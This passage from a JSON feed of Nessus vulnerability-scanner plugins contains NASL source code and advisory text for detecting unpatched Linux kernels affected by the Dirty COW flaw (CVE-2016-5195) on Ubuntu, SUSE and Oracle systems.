get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3107-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-26-generic\", pkgver:\"4.8.0-26.28\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-26-generic-lpae\", pkgver:\"4.8.0-26.28\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"linux-image-4.8.0-26-lowlatency\", pkgver:\"4.8.0-26.28\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.8-generic / linux-image-4.8-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:55", "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-5195: A local privilege escalation using\n MAP_PRIVATE was fixed, which is reportedly exploited in\n the wild (bsc#1004419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-27T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2657-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-27T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-xen", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-default"], "id": "SUSE_SU-2016-2657-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2657-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94324);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2657-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-5195: A local privilege escalation using\n MAP_PRIVATE was fixed, which is reportedly exploited in\n the wild (bsc#1004419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE 
security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1004419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5195/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162657-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46c4b780\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1562=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1562=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-default\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_54-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_54-default-3-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_54-xen-3-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:24:01", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds)\n [Orabug: 24928591] (CVE-2016-5195)", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-24T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0150) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-24T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": 
"ORACLEVM_OVMSA-2016-0150.NASL", "href": "https://www.tenable.com/plugins/nessus/94229", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0150.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94229);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0150) (Dirty COW)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds)\n [Orabug: 24928591] (CVE-2016-5195)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-October/000570.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2f842fa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! 
preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:02", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.13.3.el7uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928591] {CVE-2016-5195}", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-24T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3633) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-24T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el7uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el6uek", "cpe:/o:oracle:linux:7", 
"p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2016-3633.NASL", "href": "https://www.tenable.com/plugins/nessus/94224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3633.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94224);\n script_version(\"2.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3633) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.13.3.el7uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928591] {CVE-2016-5195}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006429.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006430.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.13.3.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3633\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.13.3.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", 
reference:\"kernel-uek-devel-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.13.3.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.13.3.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.13.3.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.13.3.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:50:48", 
"description": "From Red Hat Security Advisory 2016:2105 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-26T00:00:00", "title": "Oracle Linux 6 : kernel (ELSA-2016-2105) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-26T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2016-2105.NASL", "href": "https://www.tenable.com/plugins/nessus/94264", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:2105 and \n# Oracle Linux Security Advisory 
ELSA-2016-2105 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94264);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2105\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2016-2105) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2105 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. 
